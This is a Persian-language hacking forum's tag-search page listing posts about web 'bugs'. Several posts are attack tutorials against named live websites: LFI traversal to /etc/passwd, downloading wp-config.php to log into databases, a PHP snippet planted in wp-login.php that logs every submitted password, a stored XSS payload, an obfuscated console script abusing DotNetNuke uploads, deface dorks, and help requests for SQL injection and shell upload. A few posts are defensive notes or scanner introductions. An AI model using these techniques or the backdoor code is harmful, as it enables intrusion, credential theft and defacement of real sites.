رفتن به مطلب



iran rules jazbe modir
ADS mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'باگ'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


انجمن آموزش امنیت و راه های مقابله با نفوذ

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
  • بخش ویژه (مخصوص اعضای ویژه)
  • پروژه های تیم
  • مسابقات
  • عمومی
  • بحث آزاد علمی
  • بخش دریافت
  • آرشیو

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

46 نتیجه پیدا شد

  1. باگ چیست ؟ در سال 1945 ماشین حسابی به مشکل بر خورد و از کار افتاد که خانمی با نام گریس هاپر به جستجو و رفع این مشکل پرداخت و شروع به جستجو کرد و جالب است که بدانید مشکل از وجود یک حشره در میان قطعات دستگاه بود و زمانی که ان حشره را از میان قطعات بیرون کشیدند دستگاه مجدد شروع به کار کرد اما امروزه باگ ها به دلیل وجود حشرات نیستند بلکه باگ ها از اشتباهات برنامه نویسان به وجود می اید که باعث به وجود امدن مشکلاتی ازجمله مشکلات امنیتی می شود و هکر ها از این مشکلات امنیتی می توانند استفاده کنند و به هدف دلخواه خود دست پیدا نمایید که در ادامه بیشتر با این موضوع مهم اشنا خواهید شد.
  2. arman

    Hacking-Bugs اموزش هک سایت باگ lfd و lfi

    سلام دوستان امروز میخوایم باهم در مورد باگ های lfd و lfi صحلت کنیم باگ lfd یعنی باگی که اجازه دانلود هر فایلی را بهتون میده و میتونید هر فایلی که دوست دارید رو دانلود کنید مثلا فایل config سایت که خیلی مهم است و یوزد و پسورد دیتابیس روی اون هستش که در سایت های جوملایی یا وردپرسی این باگ دیده میشه که به عنوان مثال پلاگین revslider در وردپرس این باگ رو داره و ما میتوانیم فایل wp-config.php را دان و سایت رو هک کنیم اگر دوست داشتید دورک گوگل و اکسپلویت را دانلود کنید به لینک زیر مراجعه نمایید. https://www.exploit-db.com/exploits/36554/ خوب برای باگ lfi مثلا مثل باگ lfd عمل میکنه فقط فرقش اینه که ما با باگ lfd میتونیم یک فایل را دانلود کنیم ولی در این باگ ما میتونیم کدهای درون فایل مورد نظر را در خود وبسایت ببینیم چند سایت نمون برای این باگ براتون میزارم https://www.arcon-cad.at/?page=index.php http://www.thesom.org/index.php?page=index.php خب برای این که ببینیم این باگ رو داره هر چی جلوی page هست رو پاک میکنیم یعنی این شکلی https://www.arcon-cad.at/?page= http://www.thesom.org/index.php?page= خب حالا ما میخوایم به فایل etc/passwd دسترسی پیدا کنیم پس این کار را انجام میدیم https://www.arcon-cad.at/?page=../../../../etc/passwd http://www.thesom.org/index.php?page=../../../../etc/passwd خب بعد از اینکار فایل etc/passwd رو به شما نشون میده و شما میتونید این سایت رو هک کنید خب آموزش به پایان رسید امیدوارم خوب بوده باشه خدا نگهدار.
  3. سلام خدمت دوستان دوستان بنده به یک سایت نفوذ کردم ولی متاسفانه پسوردای 4 تا ادمینش رو نتونستم کرک کنم و نتونستم وارد پنل بشم !!! حالا میخوام از طریق این باگ شل اپلود کنم وقتی کد رو وارد میکنم بهم ارور زیر رو میده Access denied for user 'golsh_ch'@'localhost' (using password: YES) کسی راهی برای باپیسش نداره ؟
  4. باگ XXE چیست ؟ سایت های بسیاری در جهان هک میشوند و هر سایتی از روش ها و باگ های مختلفی مورد نفوذ قرار میگیرند اما در این اموزش به باگ XXE رایج در وب اپلیکیشن ها میپردازیم این باگ مخفف XML External Entity میباشد همانطور که از نامش پیداست مربوط به XML میشود در واقع امکان اجرای کد های xml را به هکر میدهد سطح دسترسی در باگ XXE سطح دسترسی میتواند برای هکر بسیار بالا باشد به دلیل ان که امکان نوشتن و خواندن کد XML دارند میتواند بعضی فایل های درون سرور را با استفاده از این باگ بخوانند و اطلاعات حساسی را از درون سرور بردارند یا حتی در مواردی هم میتوانند در سرور دستور اجرا کنند که به همین دلیل میتوان گفت xxe یکی از باگ های بسیار خطرناک و مهم است در بهترین حالت ممکن هکر درون فایل xml یک دیفیس قرار میدهد و سایت را دیفیس میکند روش های دیگری هم در شرایط مختلف میتواند وجود داشته باشد که ما به چند مورد از ان ها اشاره کرده ایم اموزش باگ یابی XXE روش های زیادی برای جستجو کردن این نوع از باگ ها وجود دارد مانند استفاده از ابزار ها و غیره اسکنر ها : بعضی از اسکنر های امنیتی برای امنیت بیشتر در وبسایت ها باگ xxe را مورد برسی در هنگام اسکن قرار میدهند هر مقدار اسکنر ها باگ ها بیشتری را شناسایی کنند و حساسیت ان ها بلاتر باشد اسکنر قدرتمند تری میشوند به طور مثال میتوانید اموزش نسوس را مشاهده کنید که یکی از اسکنر های امنیتی بسیار عالی میباشد و قابلیت اسکن باگ xxe را هم دارد اسکنر های دیگری هم هستند مانند اکانتیکس که میتوانید از ان ها هم استفاده کنید آموزش و دانلود اکانتیکس را مشاهده کنید جستجو دستی : در جستجو دستی هکر باگ را باید با تست های مکرر پیدا کند که زمان زیادی میگیرد اما دقیق تر انجام میشود نتیجه گیری اموزش باگ XXE باگ XXE یک باگ حساس امنیتی در وب اپلیکیشن ها است که از طریق ورودی هایی که امکان ارسال xml را میدهند بوجود می اید و این امکان را دارد تا کاربر کد های ان را بخواند و تغیر دهد برای پیدا کردن این باگ میتوانید به صورت دستیو یا با اسکنر ها اقدام کنید
  5. rezasarwary

    Hacking-Bugs باگ xss

    سلام من یک سایت رو پیدا کردم که باگ xss داره و چند مرحله رو رفتم ولی میخوام که محتوای یه خط از سایت رو تغیر بدم نمیشه شاید کدم مشکل داشته باشه یکی کمکم کنه. کد:::::: "/><script>document.getElementByClassName('head').innerHTML="HI ADMIN"</script>
  6. سلام من روی یک سایت تست باگ sql میکردم تیبل هایشو پیدا کردم و در ادامه وقتی که میخواستم ستون هایشو پیدا کنم که به این ارور برخوردم :::::::::: SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\'tbl_administrators\'\' -- - AND is_active=1 ORDER BY product_name ASC LIMIT ' at line 1 بنظرم به ' این حساسه اینو برداشتم این ارور رو داد :::::::::: SQL/DB Error -- [Unknown column 'tbl_administrators' in 'where clause'] اینم سایتش با مراحلی که رفتم ::::::::::: Bradford Shoes - Product
  7. قوانین تاپیک اسپم مننوع سوال بی جا ممنوع در بخش پرس پاسخ سوال کنید این تاپیک فقط دستوراتی که باگ رو باهاش میشه شناسایی کرد اموزش دهنده inj3ct0r Rednofozi ReZa CLONER Moeein Seven
  8. جستجو باگ و بالا بردن سطح دسترسی در لینوکس هسته لینوکس ( کرنل ) همان طور که از نام ان پیداست کرنل هسته لینوکس میباشد که وظایف مهمی در سیستم عامل دارد از وظایف کرنل میتوان مدیریت سخت افزار و سیستم عمل را گفت که امر بسیار مهمی است و همچنین مدیریت نرم افزاری سیستم عامل به طور خلاصه کرنل یکی از اصلی ترین منبع سیستم میباشد که وظیفه ان مدیرین بخش های اصلی سیستم میباشد توضیحات جستجو باگ در بسیاری از مواقع ما تست فوذ را از سمت سرور انجام میدهیم و میخوایم سطح دسترسی خود را بالا برده و به بخش های دیگر سرور دسترسی پیدا کنیم اما امروزه با اپدیت های جدید کرنل ها باگ های امنیتی ان ها رفع میشوند و نمیتوان از اکسپلویت های عمومی شده استفاده کرد به همین علت در این پست اموزشی ابزاری را اموزش میدهیم که میتوان با ساتفاده از ان اسیب پذیری های سیستم را جستجو کند و سطح دسترسی را در سیستم عامل مورد نظر بالا برد قابل استفاده در سیستم عامل های زیر برای جستجو باگ MAC , مک : این ابزار در بعضی موارد در سیستم عامل مک کاربرد دارد و میتوان با استفاده از ان سطح دسترسی را ارتقا داد تشخیص قالب وردپرس Linux , لینوکس : اموزش این مطلب بیشتر مربوط به سیستم عامل های لینوکس مانند: Centos , Debian , … میباشد نکته : متاسفانه این ابزار برای سیستم عامل ویندوز طراحی نشده است و میتواند از روش های دیگر برای ارتقا سطح دسترسی در ویندوز استفاده کنید اموزش نصب ابزار برای جستجو باگ پیشنیاز های نصب ابتدا از نصب بودن python در سیستم عامل خود مطمئن شوید سپس با دستور زیر ابزار را در لینوکس خود دریافت کنید git clone Link Link را از اخر صفحه دریافت کنید سپس وارد پوشه دانلود شده شوید cd kernelpop و ابزار را اجرا کنید نکته : ابزار با پایتون ۲ و ۳ سازگار است python kernelpop.py درصورتی که پایتون در سیستم عامل خود نصب شده ندارید از bash به صورت زیر استفاده کنید بعد از دانلود و وارد پوشه ابزار از دستورات زیر استفاده کنید create_executable.sh/. kernelpop/. دانلود ابزار جستجو باگ GitHub - spencerdodd/kernelpop: kernel privilege escalation enumeration and exploitation framework
  9. باگ SQL Injection یکی از شایع ترین باگ های موجود است. در این باگ خطرناک هکر دسترسی کامل به دیتابیس میگیرد و می تواند دستورات SQL را از تزریق آنها در URL اجرا کند. وقتی که شما کنترل دیتابیس را دشته باشید هرکاری میتوانید بکنید. از باگ SQL می تواند به مقاصد مختلفی دست پیدا کرد. از بدست آوردن یوزر و پسورد کاربران و ادمین گرفته تا دیفیس کردن و… باگ SQL هیچ ربطی به کمبود امنیت در دیتابیس ندارد و مقصر اصلی به وجود آمدن این باگ برنامه نویس و شخصی که سرور را کانفینگ کرده، است. هرچند که نمی توان به برنامه نویس هم خرده گرفت. چون برنامه نویس که در زمینه امنیت فعالیت نداشته است. هرچند که بهتره داشته باشد اما اگر ندارد هم مشکلی ندارد به دنبال مقصر دوم میرویم. کسی که سرور را کانفیگ کرده یا مدیر اون هاستینگ که سایت روی سرور های آنحا قرار دارد. هاستینگ ها باید به گونه ای عمل کنند که حتی اگر سایتی هم باگ داشت، با قرار دادن اون سایت روی سرور خود اکثر این باگ های شایع بر طرف بشوند. باگ SQL برای تمام دیتابیس ها وجود دارد. پایگاه داده هایی از جمله oracle, Microsoft SQL , mySQL , mariadb و … طی یک تحقیقات که در سال ۲۰۱۷ بر روی ۳۹۶ سایت صورت گرفت ۵۵ سایت داری این آسیب پذیری بودند و این عدد یعنی چیزی حدود ۱۴ درصد که در دنیای هک رقم قابله توجهی است. برای استفاده از باگ SQL injection هکر باید دستورات SQL را در url وارد کند و این نیازمند این است که هکر با دستورات SQL آشنا باشد. باگ sql injection یعنی مقداری نیاز به دانش دارد.اما ابزار های مانند jSQL و SQLmap ساخته شدند که راه را برای دیگر هکر ها آسان کنند. این ابزار ها نیاز به هیچگونه دانشی در زمینه پایگاه داده ندارند و براحتی می توانند به پایگاه داده نفوذ کنند. JSQL یک ابزار بسیار ساده و کاربردی است و شاید به جرات بتوان گفت یکی از ساده ترین ابزار ها برای اجرای باگ SQL است چون محیط تماما گرافیکی دارد. استفاده از jSQL حتی از SQLmap هم بسیار آسان تر است این ابزار سبک و متن باز برای سیستم عامل های ویندوز ، لینوکس، مک ، سولاریس در دسترس است امیدوارم از این آموزش هم لذت برده باشید امنیت را جدی بگیرید شاد و پیروز باشید…
  10. توضیحات مرورگر تور یکی از امن ترین مرورگر ها برای جستجو میباشد که در اموزش قبلی دارک وب با استفاده از این مرورگر وارد این شبکه شدیم اما مدتی است که یکی از افزونه هایی که بصورت دیفالت در ان نصب است دچار حفره امنیتی خطرناکی شده است افزونه NoScript که شامل این اسیب پذیری است نقش محمی برای شناسایی نشدن در دنیای اینترنت را داشت و همچنین در مرورگر فایرفاکس میتوانید از ان استفاده کنید از ان جایی که مرورگر تور برپایه فایرفاکس است در ان وجود دارد و نقش افزونه مرورگر NoScript جلوگیری از اجرای اسکریپت ها مانند JavaScript, Flash و Java در وب سایت های مختلف میباشد اما با باگ ۰day که در ان پیدا شده است این امکان فراهم شده که اسکریپت را حتی با فعال بودن افزونه بر روی کلاینت اجرا کند که این میتواند خطر های امنیتی بسیاری داشته باشند مانند ردیابی کلاینت و … امنیت در افزونه مرورگر NoScript TOR به راحتی یک وبسایت میتواند با استفاده از این باگ صفر روزه ای پی شخص را بدست اورد و این اسیب پذیری در نسخه های 5.0.4 تا ۵٫۱٫۸٫۶ وجود دارد در نسخه جدید Tor 8 شاهد طراحی جدید در Api های ان هستیم و این اسیب پذیری به طور کامل رفع شده است پیشنهاد میشود برای حفظ امنیت خود هرچه سریع تر مرورگر Tor خود را به اخرین نسخه اپدیت کنید ابزار sublist3r جدید برای جمع اوری اطلاعات و درصورتی که در مرورگر خود اپدیتی برای افزونه دریافت کردین ان را به همراه هسته مرورگر بروزرسانی کنید برای برسی اپدیت های افزونه NoScript به لینک زیر وارد شوید NoScript - JavaScript/Java/Flash blocker for a safer Firefox experience! - get it! - InformAction
  11. تو این قسمت میخواییم به وب سایت هایی تست نفوذ بزنیم که باگ LFD‌ رو دارن و با استفاده از این باگ به بانک اطلاعاتیشون دسترسی پیدا کنیم و بتوینم فایل هایی که تو وب سایت مورد نظر اپلود شده رو دانلود کنیم. نکته : این تستی که ما میزنیم مخصوص وب سایت هایی هستش که از PHP‌ به عنوان زبان سمت سرور استفاده کردن بیشتر رو وب سایت های وردپرسی تست میکنن خب ماهیت این باگ اینه که شما بدون دسترسی به هاست وب سایت بتونین فایل هایی مثل CONFIG.PHP رو دانلود کنید اولین کاری که میکنین اینه که تارگت مورد نظرتون رو پیدا کنید یعنی یه سایتی که بتونیم روش تست بزنیم (اینجا چون جنبه اموزشی داره پس تارگتی هم وجود نداره فقط یه اسم به عنوان تارگت براتون در نظر میگیرم) تارگت : KOKOTOKO.COM خب ادرس رو تو مرورگر وارد میکنید صب میکنید تا لود شه بهد کد زیر رو به ادرس اضافه میکنید download.php?file-wp-config.php که اگه ادرسمون این باشه KOKOTOKO.COM اینطوری تو مرورگر وارد میکنیم KOKOTOKO.COM/download.php?file-wp-config.php نکته : تو سایت هایی که فایل download.php وجود نداره دیه این کد عمل نمیکنه. خب ما در نظر میگیرم سایتمون این باگ رو داره (همونطوری که خیلی از سایت های وردپرسی این باگ رو دارن) پس کد رو تو مرورگر وارد میکنیم تا اینکه تارگت یه فایل برای دانلود به ما میده (همون پنجره ای که برای دانلود محتوا یا موزیک بهمون میده مث همونه) فایل مورد نظر رو با notepad++ یا ابزار هایی مث دریم ویور open کنید باز که شد یه سری کد php بهتون نشون میده شما کاری که میکنید اینه که یه تابعی رو پیدا میکنید که بالاش به عنوان کد راهنما نوشته mysql hostname اگه بخوام خوشگل بگم اینطوریه : <left> /** MySQL hostname */ define('DB_HOST', 'ادرس هاست رو درونش نوشته '); <left> خب ادرس درون تابع رو کپی میکنید تو url یا بهتر یگم تو مروگر یه تب باز میکنید و ادرس درون تابع رو درونش کپی میکنید و بعدش اینتر میزنید تا یه صفحه براتون باز بشه که داخلش یه پنجره هتسش یه لینک بهتون میده به پایگاه داده مورد نظر خب رو لینک کلیک کنید تا برید به ادرس پایگاه داده یعنی صفحه بانک اطلاعاتی براتون باز میشه حالا اینجا بانک اطلاعاتی از شما یوزنیم و پسورد میخواد کاری که میکنید اینه میایید رو فایل مورد نظر (همون wp-config.php ) میایید تابعی رو پیدا میکنید که در کد راهنمای اون نوشته MySQL database username اگه باز بخوام بهتر بگم اینه <left> define('DB_USER', 'usernamehere'); <left> دوستان یوزر نیم رو داخل تکس باکس مورد نظر کپی میکنید و حالا واسه پسورد میایید این تابع رو پیدا میکنید <left> /** MySQL database password */ define('DB_PASSWORD', 'yourpasswordhere'); <left> پسورد مورد نظر رو داخل پسورد کپی میکنید و بعدش رو دکمه go کلیک میکنید تا بانک مورد نظر باز شه
  12. ابتدا تور را دانلود و نصب نمیایید برای دانلود از لینک زیر دانلود نمایید tor] بعد از دانلود کردن نصب و راه اندازی کنید بعد از اینکه تور فعال شد وارد fire fox شوید و به قسمت پراکسی رفته و ایپی 127.0.0.1 را بنویسید و سیو کنید الان تور بر روی فایر فاکس شما متصل خواهد شد میتوانید به سایت های onion بدون دردسر بروید اگر برای تلگرام میخواهید استفاده کنید به جای پروکسی ایپی 127.0.0.1 استفاده کنید اگر برای کرک میخواهید استفاده کنید کافیه پروکسی 127.0.0.1 را به کرکر خود اضافه کنید باتشکر
  13. # Dork: intitle:Priv8 SCR Exploit: http://localhost/config/config.izo Write Your Deface Hacked By .... and clic "Hajar" If Done Check deface : http://localhost/config/tar.tmp
  14. Rednofozi

    Hacking-Bugs باگ Local File Download

    اگر واسه دانلود فایلی توی گوگل سرچی کرده باشید متوجه میشید که بعضی از سایت ها از صفحه ای واسه دانلود کردن فایل به وسیله کاربر استفاده میکنند به طور مثال http://anonysec.org/download.php?file=hacking.pdf از ادرس بالا به شما اجازه دانلود فایل hacking.pdf رو میده از اونجایی که توی بیشتر موارد ورودی ها چک نمیشه و کاربر میتونه هر فایلی رو که بخواد دانلود کنه موجب هک شدن سایت میشه. خوب چطور؟ وقتی که ورودی ها کنترل نشن و کاربر اجازه دانلود هر فایلی رو داشته باشه میتونه فایل های مهم از جمله کانفیگ وب سایت رو دانلود کنه و به صورت Remote به دیتابیس دسترسی پیدا کنه و با عوض کردن پسورد مدیر سایت از توی دیتابیس اقدام به هک کردن و تغییر چهره وب سایت کنه. hairline.it hairline.it منبع anonysec
  15. مهاجم با ارسال کد جاوا اسکریپت در قسمت نظرات میتواند کنترل وب سایت وردپرسی را در دست بگیرد. با حفره Cross Site Script مهاجم می تواند رمز عبور مدیر را تغییر یا حساب کاربری جدیدی در سایت ایجاد کند و یا انجام هر چیز دیگری که مدیر در حال حاضر وارد شده می تواند بر روی سیستم هدف انجام دهد در حال حاضر وردپرس ورژن های 4.2, 4.1.2, 4.1.1, 3.9.3. تمامی آسیب پذیر میباشد. <a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a>
  16. معمولا کد های wp-login.php سایت وردپرس رو ویرایش میکنن و هر زمان که لوگین میکنیم پسورد جدید توی فایل txt ذخیره میشه یا ایمیل میشه واسه هکر. با اضافه کردن کد زیر به فایل wp-login.php <?php $handle = fopen("wp-admin/includes/error_log.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); ?> پسورد ها در مسیر زیر ذخیره میشوند. wp-admin/includes/error_log.txt منبع anonysec
  17. طبق گزارش exploit-db باگ جدیدی و خطرناکی در پلاگین vBSEO یافت شده همچنین تیم vBSEO چون دیگه از این پلاگین پشتیبانی نمیکنه نحوه فیکس این باگ توسط vbulletin.com ارائه شده برای فیکس این باگ به vbseo/includes در هاستتون برید و فایل functions_vbseo_hook.php رو باز کنید داخل functions_vbseo_hook.php دو خط کد زیر رو پیدا کنید if(isset($_REQUEST['ajax']) && isset($_SERVER['HTTP_REFERER'])) $permalinkurl = $_SERVER['HTTP_REFERER'].$permalinkurl; و با کد زیر جایگزین کنید // if(isset($_REQUEST['ajax']) && isset($_SERVER['HTTP_REFERER'])) // $permalinkurl = $_SERVER['HTTP_REFERER'].$permalinkurl; منبع:anonysec
  18. Rednofozi

    Hacking-Bugs باگ WordPress 4.2 Stored XSS

    نسخه فعلی وردپرس یعنی ورژن 4.2 که چند روز پیش منتشر شد دارای آسیب پذیری XSS میباشد مهاجم با ارسال کد جاوا اسکریپت در قسمت نظرات میتواند کنترل وب سایت وردپرسی را در دست بگیرد. با حفره Cross Site Script مهاجم می تواند رمز عبور مدیر را تغییر یا حساب کاربری جدیدی در سایت ایجاد کند و یا انجام هر چیز دیگری که مدیر در حال حاضر وارد شده می تواند بر روی سیستم هدف انجام دهد. آسیب پذیری جدید XSS در این ورژن به تازگی منتشر شده که سایت های وردپرسی مورد حمله نفوذگر ها قرار داده است. در حال حاضر وردپرس ورژن های 4.2, 4.1.2, 4.1.1, 3.9.3. تمامی آسیب پذیر میباشد. <a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a>
  19. کتابی در مورد کار با یونیکس و راه اندازی ان امید وارم خوشتان امده باشد . لینک کتاب
  20. ابزار های خوبی به صورت انلاین برای تشخیص کد اسیب پذیر توی نت وجود داره که با دادن کد هایی که تو اسیب پذیر بودنشون شک دارید میتونید از این طور سایت ها یا برنامه هم استفاده کنید. البته فراموش نکنید اعتمادی به این چیزا به طور 100٪ درصد نکنید. وب سایت find-xss داری بخشی برای انالیز کد php برای وجود ۲ باگ Sql Injection و همچنین Cross Site Script میباشد. با مراجعه به لینک بالا میشه کد اسیب پذیر رو درون سایت اپلود کرد و اسکریپت سایت تشخیص میده باگی وجود داره یا خیر برای نمونه کد بر روی وب سایت تست کردیم که به درستی تشخیص داد کد بالا از اسیب پذیری برخوردار است
  21. معرفی ابزار Joomlavs برای کشف باگ از جوملا Joomlavs یک اپلیکیشن نوشته شده به زبان روبی است که به نفوذگر امکان ارزیابی خودکار برای یافتن آسیب پذیری های مدیریت محتوا و اسکریپت جوملا را میدهد این اپلیکیشن میتواند به محققان امنیتی و مدیران سایت ها امکان انالیز وب سایت جوملایی خود را برای یافتن اسیب پذیری ها دهد. Joomlavs می توانید برای آسیب پذیری های موجود در ماژول ها و قالب ها و همچنین دنبال اسیب پذیری های موجود در هسته جوملا را دهد Joomlavs با اسکن و شناسایی ورژن کامپوننت ها و اکسپلویت ها اقدام به شناسایی باگ ها و مشکلات امنیتی یک سایت جوملایی میکند که مدیران سایت های جوملایی میتوانند از این ابزار جهت بهبود و افزایش امنیت وب سایت جوملایی خود استفاده کنند. برای استفاده از Joomlavs نیاز به نصب روبی ورژن 2.0 در سیستم عامل میباشد. جهت دانلود میتوانید از لینک زیر استفاده کنید. GitHub - rastating/joomlavs: A black box, Ruby powered, Joomla vulnerability scanner https://github.com/rastating/joomlavs/archive/master.zip
  22. Rednofozi

    Hacking-Bugs باگ XSS چیست ؟

    آسیب پذیری XSS مخفف سه کلمه Cross site scripting میباشد که به معنی اجرا اسکریپت در سایت میباشد همان طور که از نامش پیداست به نفوذگر این امکان را میدهد تا اسکریپت خود را در وبسایت اراجرا کند این اسکریپ ها فقط و میتوانند از زبان های کلاینت سرور باشند یعنی برای کاربر قابل مشاهده است به عنوان مثال برای درک بهتر از زبان های html , css , javascript استفاده میشود که هر کدام کاربرد و مزیت های خود را دارند
  23. خب دوستان شما میتوانید با اضافه کردن دستور زیر در کنسول مرورگر خود (ترجیها کروم) قابلیت اپلود در سایت هایی که از سیستم DotNetNuke استفاده میکنند ایجاد کنید var _0x9c29=["\u0628\u0627\u06AF\x20\u062F\u06CC\x20\u0627\u0646\x20\u0627\u0646\x20\u0641\u0639\u0627\u0644\x20\u0634\u062F\x20\x2E\x20\u062A\u06CC\u0645\x20\u0647\u06A9\u0631\u06CC\x20\u0622\u0646\u0648\u0646\u06CC\u0645\u0648\u0633\x20\u0634\u0639\u0628\u0647\x20\u06A9\u0644\u0648\u0628\x20\u0648\x20\u062A\u0644\u06AF\u0631\u0627\u0645\x20\x2E"];var _0x4833=[_0x9c29[0]];alert(_0x4833[0]) var _0x7c8a=["\x63\x74\x6C\x55\x52\x4C\x24\x63\x6D\x64\x55\x70\x6C\x6F\x61\x64",""];javascript:__doPostBack(_0x7c8a[0],_0x7c8a[1]); هرگونه سوالی درباره این باگ و اسکریپت داشتید در بخش پرسش و پاسخ مطرح کنید موفق باشید
  24. Mrb3hz4d

    Hacking-Bugs هک سایت با باگ RFU

    آموزش دیفیس سایت با باگ RFU دورک: inurl:frame=product_detail اسکریپت: jscripts/FCKeditor/editor/filemanager/upload/test.html
  25. دوستان نرم افزار باگ اسکنر برای اسکن کردن باگ های سایت ها می توانید از این نرم افزار برای پیدا کردن حفره های امنیتی وب سایت خودتون و هم برای هک کردن سایت ها استفاده کنید لینک دانلود : دانلود نرم افزار Acunetic
×
×
  • جدید...